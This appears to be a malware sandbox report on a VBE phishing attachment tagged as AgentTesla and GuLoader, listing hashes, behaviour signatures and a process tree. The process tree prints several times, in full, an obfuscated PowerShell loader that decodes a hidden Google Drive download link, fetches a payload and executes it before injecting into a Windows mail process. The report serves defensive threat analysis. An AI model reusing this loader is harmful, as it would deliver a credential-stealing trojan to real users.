Overview

overview

10

Static

static

1

Pictures C...on.vbe

windows7-x64

10

Pictures C...on.vbe

windows10-2004-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    23-09-2024 14:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Pictures Catalog for Order Specification.vbe

  • Size

    14KB

  • MD5

    e5b0cb3019b7a60bd58fe2d18d75be4b

  • SHA1

    7a35bcb814b31bb3f2d089cac43d6e0db6373a6a

  • SHA256

    403347a566bd33798ee17e8b7d546dbe8ec4123a849bf3a9b3f948b72caf0a0a

  • SHA512

    a54ca5b82a7c430e42c9dadb91b56e03058027fdcc2e2e8f81569d24b0e6e0032005331a1ae064632f89797334e8afd03655b2491547e93925e703f15888af40

  • SSDEEP

    384:wCQ3GOmBsxCn5NbEDE2PlWdjSsTivPTknILvTY:q39cs85ctyjSsaPT/vc

Score
10/10
agentteslaguloadercredential_accessdiscoverydownloaderexecutionkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pictures Catalog for Order Specification.vbe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:784
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Pseudoacacia ralliform Unmigrative Sjofelist #>;$Petasos='Scoopene130';<#Markedsdagens Unmistrustfully Buttering Tiahuanacan Overenskomstansat Antiredeposition Eubacteria #>;$Unallurable=$host.PrivateData;If ($Unallurable) {$Straffefanges++;}function Smaalandshavets($Flappe){$Emissionen=$Flappe.Length-$Straffefanges;for( $Barneglad=4;$Barneglad -lt $Emissionen;$Barneglad+=5){$Psalms+=$Flappe[$Barneglad];}$Psalms;}function Quandong($Expedients){ .($Carper) ($Expedients);}$expertising=Smaalandshavets 'JustMMomioIridzgasbiEl slNor lUrocaUnba/Sidd5Bi h. lee0Ster Unvi(SlibW hiriForen Undd Meso IntwG sts D.s UnfeNSoldTCoe A en1 uln0V ld. Tru0Arzu;Swel araWMicri Slen ebl6,uls4Af k;Clot BedfxHypn6 Mo 4Sena;Tria MisprTac vSam.:Mala1 Vit2terp1 N n. hak0Diba)B bl MelGDic eToxic usykJegooPlat/Gasp2A yl0Mod.1fyld0 vst0Vapu1Crot0 nre1Pl,m SejrFTriniF,narApose ecofNatuoSprox Mag/Risl1 E.c2Te,o1Berk.Eldf0 Eks ';$Serbians=Smaalandshavets 'LflauEsthsKoloeBo lr L.e- st AA.phGun oeAsecnsti t Jol ';$Exheredate=Smaalandshavets 'Sutth SchtFrugt lapOksesjeer:Whee/Phlo/syntduntrrDiheichrivNym eHone.AbscgBlomosingoKrisg onolVur eOu a.VrdecStato remmSpar/Morfu Undc und?Delee ekux DogpOscuo.enurSvn tFyld= In dBl no MucwProsn edslHjpao B,saTrumd.dfa&ForkiAmiadPara=Goni1 Maez AtmuopspcBogbjAnsvIDelaL MobPLiljrCoupOFaseyPartxNona4 Ps SPurvMguyeE I dRPetrv.nmaAManuOHoldJmu eRBehe_,npl-Ext.e ModKFamiJ arln nov7Bu iZVinkfGastmReg HUdl. ';$Engsnarernes=Smaalandshavets 'Phil>Proc ';$Carper=Smaalandshavets 'AntiiPetuEhom xBagh ';$Diaphyseal='Heliornithidae';$Partioffentlighed = Smaalandshavets ' LoaeRefec nonhMarcoTotu Pass% TalaF rgpR edp Suvd raaKrsetKrisaHare% M d\EnebS n.nyInjunA tio TandTh r.StbeNKommi ritp Imp nsp&Holl&Vel haeeOstrcNonphPersoUnpr DistRa a ';Quandong (Smaalandshavets 'Drac$CathgJaqul raoAspebPanoaIndil Poo: PlaOAksimAconvGadee delnIn edBamstcavieOdon= ire(.eckcDis m,erldV ve Angi/ ruxcAfvi Atio$ UnpPHab aMockr UfotVejriLydgoArbefHoodf Icie AfnnAchotRumflRe ri nstgRegeh bloeUnbrdCirc) udo ');Quandong (Smaalandshavets ' Med$undeg SpolDefooExotbU.sta nclFal :Flu,tRoteiUnh,ePoultSaltiSalvc M.skR,de=Antr$ IsaE TerxNotahInsoe.orarStaaetottd neraSam,tTrineTel..Skr,s StjpUdbrlC usi RettMalb( D m$ForsEBottnModegKapis ChanShu aS bfr.amwe HicrAbitnStopeMacrsPark)Sple ');Quandong (Smaalandshavets 'Mond[And N uccePe ttPe t.StriSCondeFe rrSpi vHaa.iDay,cCargeFedtPHattoKoeriSph,n UnbtHallM K iaHam nGa eaHercgUndeeArtlr Svl]Ster:Kr.f:BjerSBagheEpacc Octu ollrNonaiLog.tAngly T tPBrasrAffooOvertMetaoBltecJerno,aralCros Giav=Likv B,gg[BrudN roeCocktwels.Ele SUmbreFr mcGodsuBeprrReacistattReply SatP VitrRuskoR,thtEnteo,angc KaloUncol ,omTTmrey ,ubp ,nbeGenf]b,ug:Newi:MenaTHednlDirksSamf1,rft2 Kon ');$Exheredate=$tietick[0];$misclaim= (Smaalandshavets ' Imp$Ube.GSindL ataoor ebSophaD,rkLCoun:f ittH avOBeanBPedai ,oosGuldeIberrGleaNCapie The=,eksnHym eTromwVerd-D alO D.fBH akjUninERa ccRoldTK,nt BroesPyrsY SunSK olT ejaeBenimddsu.MininSygeeK.aptKepp.Lok w,elseSendB BegCFootL StaiAviae mprnJ ilt');$misclaim+=$Omvendte[1];Quandong ($misclaim);Quandong (Smaalandshavets 'Kalv$ViscTDrago ad.bHa liApiasSalgeCommr,okonSt meSerj.ForuH EffeOpriaBoehdP pteUmodr H asAnti[ S.i$Adj.S outeArber OvebS.lmi,navaRestnfervs,ock]Anti=Hogg$BedeeLaboxTestpBlndeFu.ertor t MyoiDes.s TuaiSor,nJ pagFrai ');$Symphile=Smaalandshavets ' Pic$D,taT Supo R,tbFaeriE.tes PreeVaugrC efn ateH id.EnerD Vico A iw Komnam.tl ordoMeniaAntadMiljFTotaisdvalSjlseSans(Ruth$R.neE ormxHerrhOplaelievr Snde eodFarmaOpgatGrupeTaxi,Komm$HjorASomanSpapsSpeckRi uuSideeSwatlIllyi Betg wrogD.uboVejoeS.igrStede MonsKamp) imc ';$Anskueliggoeres=$Omvendte[0];Quandong (Smaalandshavets 'Skom$Beskg RevL agooDolkbAft ALevoL,ili:Byr T RodrS eeaB rgNSc,ls,eatC KabeInteNNe bdDataeUnderProneJakkn GalDInteELoka=bl.c(Inhat,lyveR stsMoneTForl-FormPJakoa ndstO,sehH rn Fork$ U.eaGenenAtioSJen K .uauOps EDelsl eatINoncgAartgdow.O MisEReinRSvine LeeS Amb)Modi ');while (!$Transcenderende) {Quandong (Smaalandshavets 'Unad$Cidag,etalNonhoFolkbBa.naBa wlKrud:Sta.HChunaAzeorFor aI,qulVicedGenliArbenAnfleCath7Meni4U gt=skem$TwintSca rArchu onoeAa e ') ;Quandong $Symphile;Quandong (Smaalandshavets 'StofS tertKartaMoutrSwintAsp -Pr,sS opul B.oeBekneEngrpSto. De,o4.acr ');Quandong (Smaalandshavets 'Pr.a$Gal gD.stlP,scoOmklb.vedachill igu:A ygTUberrRullaLushnAd ps BelcAerie remnTilddmetaeAnthrLiree anvnS acdB ere Ved= For(SlarTKnkpeKa as EndtI fo-BiksP ExpaColltBevahdisc ind$ V.rAHujpnOu.tsKamakRotouTr feSirilAnpai D.fgGentg Kroo HaweColorStateE.olsNe r)lun, ') ;Quandong (Smaalandshavets ' Det$Pateg T,nlLntroAthebFedtamja lMa t:ChriCEn ee uncnMdest Glor U.soGldssTarwe Buzm rogaPo t=Mel,$ C.rgBagtlUn.io,nreb PilaEscal maa: FasSEs,ek SlirFyrsu TrepRumbpMonoeCroolUndelKlocs .steAlex+ B,n+Luft%Veni$Locut LigiInsceSt tt AnkiBedvcjurak Art.,kincFortoOffeuEvennExumtPo y ') ;$Exheredate=$tietick[$Centrosema];}$Prevalued=301004;$wayman=28491;Quandong (Smaalandshavets 'Bi e$AstagEleclJameoStalb,ystaTotalAren:A tiC CoulJol aVacusF,rapStomeSerdr agt San =Sekr ForGFnomeproctYlet-pal.CTjenoMle nZoritHj meStenn CultSexi Dub $ FutA ,penBilbsAr ekcumbuS raeOutml aemiForbg.ontgD,noo Vl.eMa.srNo,aeOpers d,c ');Quandong (Smaalandshavets 'Hosp$P,shgNejelGymnoIndbbC ulaPra.l Syg:TrepT Br.eTvann an R,gi=.als ,atr[SabbSDybdyRenws eprtVinkeAlsimTopn.ColiC stioAry,nNrmevBel.e ImprVelat Ts ]Tele:ele :CalcFTussrReveo macmLustBD oraN nfs,esoe Syn6Prol4InteSRegat AmorgnatiC,olnGentgGods(Burl$ cliCIn,olPensaLinesEjerpSej,eHyperphro)Into ');Quandong (Smaalandshavets 'Svej$ForwgS aplBr noKw pbJerraNan.l Haw:BlodBBonfjSuffeQuilr Antg Reae aannIntesMicr Grun=,krs Anti[CandSUrugyMindsM sct ante BasmPata. ichTU.dgePr sxTraptM.ut.StvnELdd nAut,cSkraoT drd DisiElatnDispgLeec].enu: T,s:GastA At S ZamCTrikIMagtIWilm. GrnGVille bratGag.SGigttSammr foniM rin GengOpht( R,m$irreTTette Su.nCoun),har ');Quandong (Smaalandshavets ' Rep$Ma,egRemalVento DribArchaRadil Gyr:StanSgivicMil r Unsu UndtBehaiFlleninteeAt.eeAngor.rgo= Tra$ plaBDepejNaaleShocrLexigJ dae AntnHa ms onv.k los.ustuAgatbSondsClubtMiljr yggiDa,nnD cogNyka(Owe $ Ar PUnctr mbeMcclvHem aRef lGranu,fskeDistdBidr, H s$ re.wEd,aaGodsyTabamIndiaNotenVare)Opst ');Quandong $Scrutineer;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2352
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Synod.Nip && echo t"
        3⤵
          PID:2780
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Pseudoacacia ralliform Unmigrative Sjofelist #>;$Petasos='Scoopene130';<#Markedsdagens Unmistrustfully Buttering Tiahuanacan Overenskomstansat Antiredeposition Eubacteria #>;$Unallurable=$host.PrivateData;If ($Unallurable) {$Straffefanges++;}function Smaalandshavets($Flappe){$Emissionen=$Flappe.Length-$Straffefanges;for( $Barneglad=4;$Barneglad -lt $Emissionen;$Barneglad+=5){$Psalms+=$Flappe[$Barneglad];}$Psalms;}function Quandong($Expedients){ .($Carper) ($Expedients);}$expertising=Smaalandshavets 'JustMMomioIridzgasbiEl slNor lUrocaUnba/Sidd5Bi h. lee0Ster Unvi(SlibW hiriForen Undd Meso IntwG sts D.s UnfeNSoldTCoe A en1 uln0V ld. Tru0Arzu;Swel araWMicri Slen ebl6,uls4Af k;Clot BedfxHypn6 Mo 4Sena;Tria MisprTac vSam.:Mala1 Vit2terp1 N n. hak0Diba)B bl MelGDic eToxic usykJegooPlat/Gasp2A yl0Mod.1fyld0 vst0Vapu1Crot0 nre1Pl,m SejrFTriniF,narApose ecofNatuoSprox Mag/Risl1 E.c2Te,o1Berk.Eldf0 Eks ';$Serbians=Smaalandshavets 'LflauEsthsKoloeBo lr L.e- st AA.phGun oeAsecnsti t Jol ';$Exheredate=Smaalandshavets 'Sutth SchtFrugt lapOksesjeer:Whee/Phlo/syntduntrrDiheichrivNym eHone.AbscgBlomosingoKrisg onolVur eOu a.VrdecStato remmSpar/Morfu Undc und?Delee ekux DogpOscuo.enurSvn tFyld= In dBl no MucwProsn edslHjpao B,saTrumd.dfa&ForkiAmiadPara=Goni1 Maez AtmuopspcBogbjAnsvIDelaL MobPLiljrCoupOFaseyPartxNona4 Ps SPurvMguyeE I dRPetrv.nmaAManuOHoldJmu eRBehe_,npl-Ext.e ModKFamiJ arln nov7Bu iZVinkfGastmReg HUdl. ';$Engsnarernes=Smaalandshavets 'Phil>Proc ';$Carper=Smaalandshavets 'AntiiPetuEhom xBagh ';$Diaphyseal='Heliornithidae';$Partioffentlighed = Smaalandshavets ' LoaeRefec nonhMarcoTotu Pass% TalaF rgpR edp Suvd raaKrsetKrisaHare% M d\EnebS n.nyInjunA tio TandTh r.StbeNKommi ritp Imp nsp&Holl&Vel haeeOstrcNonphPersoUnpr DistRa a ';Quandong (Smaalandshavets 'Drac$CathgJaqul raoAspebPanoaIndil Poo: PlaOAksimAconvGadee delnIn edBamstcavieOdon= ire(.eckcDis m,erldV ve Angi/ ruxcAfvi Atio$ UnpPHab aMockr UfotVejriLydgoArbefHoodf Icie AfnnAchotRumflRe ri nstgRegeh bloeUnbrdCirc) udo ');Quandong (Smaalandshavets ' Med$undeg SpolDefooExotbU.sta nclFal :Flu,tRoteiUnh,ePoultSaltiSalvc M.skR,de=Antr$ IsaE TerxNotahInsoe.orarStaaetottd neraSam,tTrineTel..Skr,s StjpUdbrlC usi RettMalb( D m$ForsEBottnModegKapis ChanShu aS bfr.amwe HicrAbitnStopeMacrsPark)Sple ');Quandong (Smaalandshavets 'Mond[And N uccePe ttPe t.StriSCondeFe rrSpi vHaa.iDay,cCargeFedtPHattoKoeriSph,n UnbtHallM K iaHam nGa eaHercgUndeeArtlr Svl]Ster:Kr.f:BjerSBagheEpacc Octu ollrNonaiLog.tAngly T tPBrasrAffooOvertMetaoBltecJerno,aralCros Giav=Likv B,gg[BrudN roeCocktwels.Ele SUmbreFr mcGodsuBeprrReacistattReply SatP VitrRuskoR,thtEnteo,angc KaloUncol ,omTTmrey ,ubp ,nbeGenf]b,ug:Newi:MenaTHednlDirksSamf1,rft2 Kon ');$Exheredate=$tietick[0];$misclaim= (Smaalandshavets ' Imp$Ube.GSindL ataoor ebSophaD,rkLCoun:f ittH avOBeanBPedai ,oosGuldeIberrGleaNCapie The=,eksnHym eTromwVerd-D alO D.fBH akjUninERa ccRoldTK,nt BroesPyrsY SunSK olT ejaeBenimddsu.MininSygeeK.aptKepp.Lok w,elseSendB BegCFootL StaiAviae mprnJ ilt');$misclaim+=$Omvendte[1];Quandong ($misclaim);Quandong (Smaalandshavets 'Kalv$ViscTDrago ad.bHa liApiasSalgeCommr,okonSt meSerj.ForuH EffeOpriaBoehdP pteUmodr H asAnti[ S.i$Adj.S outeArber OvebS.lmi,navaRestnfervs,ock]Anti=Hogg$BedeeLaboxTestpBlndeFu.ertor t MyoiDes.s TuaiSor,nJ pagFrai ');$Symphile=Smaalandshavets ' Pic$D,taT Supo R,tbFaeriE.tes PreeVaugrC efn ateH id.EnerD Vico A iw Komnam.tl ordoMeniaAntadMiljFTotaisdvalSjlseSans(Ruth$R.neE ormxHerrhOplaelievr Snde eodFarmaOpgatGrupeTaxi,Komm$HjorASomanSpapsSpeckRi uuSideeSwatlIllyi Betg wrogD.uboVejoeS.igrStede MonsKamp) imc ';$Anskueliggoeres=$Omvendte[0];Quandong (Smaalandshavets 'Skom$Beskg RevL agooDolkbAft ALevoL,ili:Byr T RodrS eeaB rgNSc,ls,eatC KabeInteNNe bdDataeUnderProneJakkn GalDInteELoka=bl.c(Inhat,lyveR stsMoneTForl-FormPJakoa ndstO,sehH rn Fork$ U.eaGenenAtioSJen K .uauOps EDelsl eatINoncgAartgdow.O MisEReinRSvine LeeS Amb)Modi ');while (!$Transcenderende) {Quandong (Smaalandshavets 'Unad$Cidag,etalNonhoFolkbBa.naBa wlKrud:Sta.HChunaAzeorFor aI,qulVicedGenliArbenAnfleCath7Meni4U gt=skem$TwintSca rArchu onoeAa e ') ;Quandong $Symphile;Quandong (Smaalandshavets 'StofS tertKartaMoutrSwintAsp -Pr,sS opul B.oeBekneEngrpSto. De,o4.acr ');Quandong (Smaalandshavets 'Pr.a$Gal gD.stlP,scoOmklb.vedachill igu:A ygTUberrRullaLushnAd ps BelcAerie remnTilddmetaeAnthrLiree anvnS acdB ere Ved= For(SlarTKnkpeKa as EndtI fo-BiksP ExpaColltBevahdisc ind$ V.rAHujpnOu.tsKamakRotouTr feSirilAnpai D.fgGentg Kroo HaweColorStateE.olsNe r)lun, ') ;Quandong (Smaalandshavets ' Det$Pateg T,nlLntroAthebFedtamja lMa t:ChriCEn ee uncnMdest Glor U.soGldssTarwe Buzm rogaPo t=Mel,$ C.rgBagtlUn.io,nreb PilaEscal maa: FasSEs,ek SlirFyrsu TrepRumbpMonoeCroolUndelKlocs .steAlex+ B,n+Luft%Veni$Locut LigiInsceSt tt AnkiBedvcjurak Art.,kincFortoOffeuEvennExumtPo y ') ;$Exheredate=$tietick[$Centrosema];}$Prevalued=301004;$wayman=28491;Quandong (Smaalandshavets 'Bi e$AstagEleclJameoStalb,ystaTotalAren:A tiC CoulJol aVacusF,rapStomeSerdr agt San =Sekr ForGFnomeproctYlet-pal.CTjenoMle nZoritHj meStenn CultSexi Dub $ FutA ,penBilbsAr ekcumbuS raeOutml aemiForbg.ontgD,noo Vl.eMa.srNo,aeOpers d,c ');Quandong (Smaalandshavets 'Hosp$P,shgNejelGymnoIndbbC ulaPra.l Syg:TrepT Br.eTvann an R,gi=.als ,atr[SabbSDybdyRenws eprtVinkeAlsimTopn.ColiC stioAry,nNrmevBel.e ImprVelat Ts ]Tele:ele :CalcFTussrReveo macmLustBD oraN nfs,esoe Syn6Prol4InteSRegat AmorgnatiC,olnGentgGods(Burl$ cliCIn,olPensaLinesEjerpSej,eHyperphro)Into ');Quandong (Smaalandshavets 'Svej$ForwgS aplBr noKw pbJerraNan.l Haw:BlodBBonfjSuffeQuilr Antg Reae aannIntesMicr Grun=,krs Anti[CandSUrugyMindsM sct ante BasmPata. ichTU.dgePr sxTraptM.ut.StvnELdd nAut,cSkraoT drd DisiElatnDispgLeec].enu: T,s:GastA At S ZamCTrikIMagtIWilm. GrnGVille bratGag.SGigttSammr foniM rin GengOpht( R,m$irreTTette Su.nCoun),har ');Quandong (Smaalandshavets ' Rep$Ma,egRemalVento DribArchaRadil Gyr:StanSgivicMil r Unsu UndtBehaiFlleninteeAt.eeAngor.rgo= Tra$ plaBDepejNaaleShocrLexigJ dae AntnHa ms onv.k los.ustuAgatbSondsClubtMiljr yggiDa,nnD cogNyka(Owe $ Ar PUnctr mbeMcclvHem aRef lGranu,fskeDistdBidr, H s$ re.wEd,aaGodsyTabamIndiaNotenVare)Opst ');Quandong $Scrutineer;"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2952
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Pseudoacacia ralliform Unmigrative Sjofelist #>;$Petasos='Scoopene130';<#Markedsdagens Unmistrustfully Buttering Tiahuanacan Overenskomstansat Antiredeposition Eubacteria #>;$Unallurable=$host.PrivateData;If ($Unallurable) {$Straffefanges++;}function Smaalandshavets($Flappe){$Emissionen=$Flappe.Length-$Straffefanges;for( $Barneglad=4;$Barneglad -lt $Emissionen;$Barneglad+=5){$Psalms+=$Flappe[$Barneglad];}$Psalms;}function Quandong($Expedients){ .($Carper) ($Expedients);}$expertising=Smaalandshavets 'JustMMomioIridzgasbiEl slNor lUrocaUnba/Sidd5Bi h. lee0Ster Unvi(SlibW hiriForen Undd Meso IntwG sts D.s UnfeNSoldTCoe A en1 uln0V ld. Tru0Arzu;Swel araWMicri Slen ebl6,uls4Af k;Clot BedfxHypn6 Mo 4Sena;Tria MisprTac vSam.:Mala1 Vit2terp1 N n. hak0Diba)B bl MelGDic eToxic usykJegooPlat/Gasp2A yl0Mod.1fyld0 vst0Vapu1Crot0 nre1Pl,m SejrFTriniF,narApose ecofNatuoSprox Mag/Risl1 E.c2Te,o1Berk.Eldf0 Eks ';$Serbians=Smaalandshavets 'LflauEsthsKoloeBo lr L.e- st AA.phGun oeAsecnsti t Jol ';$Exheredate=Smaalandshavets 'Sutth SchtFrugt lapOksesjeer:Whee/Phlo/syntduntrrDiheichrivNym eHone.AbscgBlomosingoKrisg onolVur eOu a.VrdecStato remmSpar/Morfu Undc und?Delee ekux DogpOscuo.enurSvn tFyld= In dBl no MucwProsn edslHjpao B,saTrumd.dfa&ForkiAmiadPara=Goni1 Maez AtmuopspcBogbjAnsvIDelaL MobPLiljrCoupOFaseyPartxNona4 Ps SPurvMguyeE I dRPetrv.nmaAManuOHoldJmu eRBehe_,npl-Ext.e ModKFamiJ arln nov7Bu iZVinkfGastmReg HUdl. ';$Engsnarernes=Smaalandshavets 'Phil>Proc ';$Carper=Smaalandshavets 'AntiiPetuEhom xBagh ';$Diaphyseal='Heliornithidae';$Partioffentlighed = Smaalandshavets ' LoaeRefec nonhMarcoTotu Pass% TalaF rgpR edp Suvd raaKrsetKrisaHare% M d\EnebS n.nyInjunA tio TandTh r.StbeNKommi ritp Imp nsp&Holl&Vel haeeOstrcNonphPersoUnpr DistRa a ';Quandong (Smaalandshavets 'Drac$CathgJaqul raoAspebPanoaIndil Poo: PlaOAksimAconvGadee delnIn edBamstcavieOdon= ire(.eckcDis m,erldV ve Angi/ ruxcAfvi Atio$ UnpPHab aMockr UfotVejriLydgoArbefHoodf Icie AfnnAchotRumflRe ri nstgRegeh bloeUnbrdCirc) udo ');Quandong (Smaalandshavets ' Med$undeg SpolDefooExotbU.sta nclFal :Flu,tRoteiUnh,ePoultSaltiSalvc M.skR,de=Antr$ IsaE TerxNotahInsoe.orarStaaetottd neraSam,tTrineTel..Skr,s StjpUdbrlC usi RettMalb( D m$ForsEBottnModegKapis ChanShu aS bfr.amwe HicrAbitnStopeMacrsPark)Sple ');Quandong (Smaalandshavets 'Mond[And N uccePe ttPe t.StriSCondeFe rrSpi vHaa.iDay,cCargeFedtPHattoKoeriSph,n UnbtHallM K iaHam nGa eaHercgUndeeArtlr Svl]Ster:Kr.f:BjerSBagheEpacc Octu ollrNonaiLog.tAngly T tPBrasrAffooOvertMetaoBltecJerno,aralCros Giav=Likv B,gg[BrudN roeCocktwels.Ele SUmbreFr mcGodsuBeprrReacistattReply SatP VitrRuskoR,thtEnteo,angc KaloUncol ,omTTmrey ,ubp ,nbeGenf]b,ug:Newi:MenaTHednlDirksSamf1,rft2 Kon ');$Exheredate=$tietick[0];$misclaim= (Smaalandshavets ' Imp$Ube.GSindL ataoor ebSophaD,rkLCoun:f ittH avOBeanBPedai ,oosGuldeIberrGleaNCapie The=,eksnHym eTromwVerd-D alO D.fBH akjUninERa ccRoldTK,nt BroesPyrsY SunSK olT ejaeBenimddsu.MininSygeeK.aptKepp.Lok w,elseSendB BegCFootL StaiAviae mprnJ ilt');$misclaim+=$Omvendte[1];Quandong ($misclaim);Quandong (Smaalandshavets 'Kalv$ViscTDrago ad.bHa liApiasSalgeCommr,okonSt meSerj.ForuH EffeOpriaBoehdP pteUmodr H asAnti[ S.i$Adj.S outeArber OvebS.lmi,navaRestnfervs,ock]Anti=Hogg$BedeeLaboxTestpBlndeFu.ertor t MyoiDes.s TuaiSor,nJ pagFrai ');$Symphile=Smaalandshavets ' Pic$D,taT Supo R,tbFaeriE.tes PreeVaugrC efn ateH id.EnerD Vico A iw Komnam.tl ordoMeniaAntadMiljFTotaisdvalSjlseSans(Ruth$R.neE ormxHerrhOplaelievr Snde eodFarmaOpgatGrupeTaxi,Komm$HjorASomanSpapsSpeckRi uuSideeSwatlIllyi Betg wrogD.uboVejoeS.igrStede MonsKamp) imc ';$Anskueliggoeres=$Omvendte[0];Quandong (Smaalandshavets 'Skom$Beskg RevL agooDolkbAft ALevoL,ili:Byr T RodrS eeaB rgNSc,ls,eatC KabeInteNNe bdDataeUnderProneJakkn GalDInteELoka=bl.c(Inhat,lyveR stsMoneTForl-FormPJakoa ndstO,sehH rn Fork$ U.eaGenenAtioSJen K .uauOps EDelsl eatINoncgAartgdow.O MisEReinRSvine LeeS Amb)Modi ');while (!$Transcenderende) {Quandong (Smaalandshavets 'Unad$Cidag,etalNonhoFolkbBa.naBa wlKrud:Sta.HChunaAzeorFor aI,qulVicedGenliArbenAnfleCath7Meni4U gt=skem$TwintSca rArchu onoeAa e ') ;Quandong $Symphile;Quandong (Smaalandshavets 'StofS tertKartaMoutrSwintAsp -Pr,sS opul B.oeBekneEngrpSto. De,o4.acr ');Quandong (Smaalandshavets 'Pr.a$Gal gD.stlP,scoOmklb.vedachill igu:A ygTUberrRullaLushnAd ps BelcAerie remnTilddmetaeAnthrLiree anvnS acdB ere Ved= For(SlarTKnkpeKa as EndtI fo-BiksP ExpaColltBevahdisc ind$ V.rAHujpnOu.tsKamakRotouTr feSirilAnpai D.fgGentg Kroo HaweColorStateE.olsNe r)lun, ') ;Quandong (Smaalandshavets ' Det$Pateg T,nlLntroAthebFedtamja lMa t:ChriCEn ee uncnMdest Glor U.soGldssTarwe Buzm rogaPo t=Mel,$ C.rgBagtlUn.io,nreb PilaEscal maa: FasSEs,ek SlirFyrsu TrepRumbpMonoeCroolUndelKlocs .steAlex+ B,n+Luft%Veni$Locut LigiInsceSt tt AnkiBedvcjurak Art.,kincFortoOffeuEvennExumtPo y ') ;$Exheredate=$tietick[$Centrosema];}$Prevalued=301004;$wayman=28491;Quandong (Smaalandshavets 'Bi e$AstagEleclJameoStalb,ystaTotalAren:A tiC CoulJol aVacusF,rapStomeSerdr agt San =Sekr ForGFnomeproctYlet-pal.CTjenoMle nZoritHj meStenn CultSexi Dub $ FutA ,penBilbsAr ekcumbuS raeOutml aemiForbg.ontgD,noo Vl.eMa.srNo,aeOpers d,c ');Quandong (Smaalandshavets 'Hosp$P,shgNejelGymnoIndbbC ulaPra.l Syg:TrepT Br.eTvann an R,gi=.als ,atr[SabbSDybdyRenws eprtVinkeAlsimTopn.ColiC stioAry,nNrmevBel.e ImprVelat Ts ]Tele:ele :CalcFTussrReveo macmLustBD oraN nfs,esoe Syn6Prol4InteSRegat AmorgnatiC,olnGentgGods(Burl$ cliCIn,olPensaLinesEjerpSej,eHyperphro)Into ');Quandong (Smaalandshavets 'Svej$ForwgS aplBr noKw pbJerraNan.l Haw:BlodBBonfjSuffeQuilr Antg Reae aannIntesMicr Grun=,krs Anti[CandSUrugyMindsM sct ante BasmPata. ichTU.dgePr sxTraptM.ut.StvnELdd nAut,cSkraoT drd DisiElatnDispgLeec].enu: T,s:GastA At S ZamCTrikIMagtIWilm. GrnGVille bratGag.SGigttSammr foniM rin GengOpht( R,m$irreTTette Su.nCoun),har ');Quandong (Smaalandshavets ' Rep$Ma,egRemalVento DribArchaRadil Gyr:StanSgivicMil r Unsu UndtBehaiFlleninteeAt.eeAngor.rgo= Tra$ plaBDepejNaaleShocrLexigJ dae AntnHa ms onv.k los.ustuAgatbSondsClubtMiljr yggiDa,nnD cogNyka(Owe $ Ar PUnctr mbeMcclvHem aRef lGranu,fskeDistdBidr, H s$ re.wEd,aaGodsyTabamIndiaNotenVare)Opst ');Quandong $Scrutineer;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2704
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Synod.Nip && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2584
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:2564

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T8FASIN1K0MM2ENIX6UQ.temp
      Filesize

      7KB

      MD5

      a8a2b7c656acb4e4ac3a4a2fd9e2282e

      SHA1

